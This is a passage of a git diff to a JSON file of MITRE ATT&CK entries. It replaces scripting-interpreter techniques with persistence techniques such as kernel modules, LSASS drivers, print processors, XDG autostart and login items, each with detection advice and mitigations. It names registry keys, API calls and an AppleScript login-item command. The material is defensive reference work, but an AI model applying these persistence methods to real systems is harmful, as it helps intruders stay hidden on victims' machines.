+                "detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
                 "mitigations": [
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
+                        "mid": "M1025",
+                        "name": "Privileged Process Integrity",
+                        "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
+                        "url": "https://attack.mitre.org/mitigations/M1025"
                     }
                 ]
             },
             {
-                "tid": "T1059.005",
-                "name": "Command and Scripting Interpreter: Visual Basic",
-                "url": "https://attack.mitre.org/techniques/T1059/005",
-                "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.",
-                "detection": "Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.",
+                "tid": "T1547.006",
+                "name": "Boot or Logon Autostart Execution: Kernel Modules and Extensions",
+                "url": "https://attack.mitre.org/techniques/T1547/006",
+                "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) \n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)\n\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)",
+                "detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\n\nOn macOS, monitor for execution of kextload commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)\n",
                 "mitigations": [
                     {
                         "mid": "M1049",
@@ -3615,11 +26649,26 @@
                         "url": "https://attack.mitre.org/mitigations/M1049"
                     },
                     {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
                     },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1547.007",
+                "name": "Boot or Logon Autostart Execution: Re-opened Applications",
+                "url": "https://attack.mitre.org/techniques/T1547/007",
+                "description": "Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \n\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).",
+                "detection": "Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.",
+                "mitigations": [
                     {
                         "mid": "M1042",
                         "name": "Disable or Remove Feature or Program",
@@ -3627,103 +26676,123 @@
                         "url": "https://attack.mitre.org/mitigations/M1042"
                     },
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
                     }
                 ]
             },
             {
-                "tid": "T1059.006",
-                "name": "Command and Scripting Interpreter: Python",
-                "url": "https://attack.mitre.org/techniques/T1059/006",
-                "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.",
-                "detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
+                "tid": "T1547.008",
+                "name": "Boot or Logon Autostart Execution: LSASS Driver",
+                "url": "https://attack.mitre.org/techniques/T1547/008",
+                "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.",
+                "detection": "With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. ",
                 "mitigations": [
                     {
-                        "mid": "M1049",
-                        "name": "Antivirus/Antimalware",
-                        "description": "Use signatures or heuristics to detect malicious software.",
-                        "url": "https://attack.mitre.org/mitigations/M1049"
+                        "mid": "M1043",
+                        "name": "Credential Access Protection",
+                        "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
+                        "url": "https://attack.mitre.org/mitigations/M1043"
                     },
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
+                        "mid": "M1025",
+                        "name": "Privileged Process Integrity",
+                        "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
+                        "url": "https://attack.mitre.org/mitigations/M1025"
                     },
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
+                        "mid": "M1044",
+                        "name": "Restrict Library Loading",
+                        "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.",
+                        "url": "https://attack.mitre.org/mitigations/M1044"
+                    }
+                ]
+            },
+            {
+                "tid": "T1547.009",
+                "name": "Boot or Logon Autostart Execution: Shortcut Modification",
+                "url": "https://attack.mitre.org/techniques/T1547/009",
+                "description": "Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\n\nAdversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.",
+                "detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.\n\nMonitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)",
+                "mitigations": [
                     {
-                        "mid": "M1033",
-                        "name": "Limit Software Installation",
-                        "description": "Block users or groups from installing unapproved software.",
-                        "url": "https://attack.mitre.org/mitigations/M1033"
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1059.007",
-                "name": "Command and Scripting Interpreter: JavaScript",
-                "url": "https://attack.mitre.org/techniques/T1059/007",
-                "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).",
-                "detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nMonitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.",
+                "tid": "T1547.010",
+                "name": "Boot or Logon Autostart Execution: Port Monitors",
+                "url": "https://attack.mitre.org/techniques/T1547/010",
+                "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.",
+                "detection": "Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. \n\nMonitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)",
+                "mitigations": []
+            },
+            {
+                "tid": "T1547.011",
+                "name": "Boot or Logon Autostart Execution: Plist Modification",
+                "url": "https://attack.mitre.org/techniques/T1547/011",
+                "description": "Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)",
+                "detection": "Monitor for common command-line editors used to modify plist files located in auto-run locations, such as ~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \n\nMonitor for plist file modification immediately followed by code execution from ~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\n\nIdentify new services executed from plist modified in the previous user's session. ",
                 "mitigations": [
                     {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
+                        "mid": "M1013",
+                        "name": "Application Developer Guidance",
+                        "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.",
+                        "url": "https://attack.mitre.org/mitigations/M1013"
                     },
                     {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
                     },
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            },
+            {
+                "tid": "T1547.012",
+                "name": "Boot or Logon Autostart Execution: Print Processors",
+                "url": "https://attack.mitre.org/techniques/T1547/012",
+                "description": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. \n\nAdversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the GetPrintProcessorDirectory API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.",
+                "detection": "Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\\\Driver or HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\Driver as they pertain to print processor installations.\n\nMonitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.",
+                "mitigations": [
                     {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1059.008",
-                "name": "Command and Scripting Interpreter: Network Device CLI",
-                "url": "https://attack.mitre.org/techniques/T1059/008",
-                "description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \n\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).\n\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)",
-                "detection": "Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)\n\nConsider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.",
+                "tid": "T1547.013",
+                "name": "Boot or Logon Autostart Execution: XDG Autostart Entries",
+                "url": "https://attack.mitre.org/techniques/T1547/013",
+                "description": "Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)\n\nWithin an XDG autostart entry file, the Type key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)\n\nAdversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.",
+                "detection": "Malicious XDG autostart entries may be detected by auditing file creation and modification events within the /etc/xdg/autostart and ~/.config/autostart directories. Depending on individual configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.\n \nSuspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.",
                 "mitigations": [
                     {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
+                        "mid": "M1033",
+                        "name": "Limit Software Installation",
+                        "description": "Block users or groups from installing unapproved software.",
+                        "url": "https://attack.mitre.org/mitigations/M1033"
                     },
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
                     },
                     {
                         "mid": "M1018",
@@ -3732,852 +26801,641 @@
                         "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
-            }
-        ],
-        "mitigations": [
-            {
-                "mid": "M1049",
-                "name": "Antivirus/Antimalware",
-                "description": "Use signatures or heuristics to detect malicious software.",
-                "url": "https://attack.mitre.org/mitigations/M1049"
-            },
-            {
-                "mid": "M1040",
-                "name": "Behavior Prevention on Endpoint",
-                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                "url": "https://attack.mitre.org/mitigations/M1040"
             },
             {
-                "mid": "M1045",
-                "name": "Code Signing",
-                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                "url": "https://attack.mitre.org/mitigations/M1045"
-            },
-            {
-                "mid": "M1042",
-                "name": "Disable or Remove Feature or Program",
-                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                "url": "https://attack.mitre.org/mitigations/M1042"
-            },
-            {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "tid": "T1547.014",
+                "name": "Boot or Logon Autostart Execution: Active Setup",
+                "url": "https://attack.mitre.org/techniques/T1547/014",
+                "description": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries may abuse Active Setup by creating a key under  HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)\n\nAdversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",
+                "detection": "Monitor Registry key additions and/or modifications to HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.",
+                "mitigations": []
             },
             {
-                "mid": "M1021",
-                "name": "Restrict Web-Based Content",
-                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1021"
+                "tid": "T1547.015",
+                "name": "Boot or Logon Autostart Execution: Login Items",
+                "url": "https://attack.mitre.org/techniques/T1547/015",
+                "description": "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.\n\nLogin items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.\n\nAdversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: 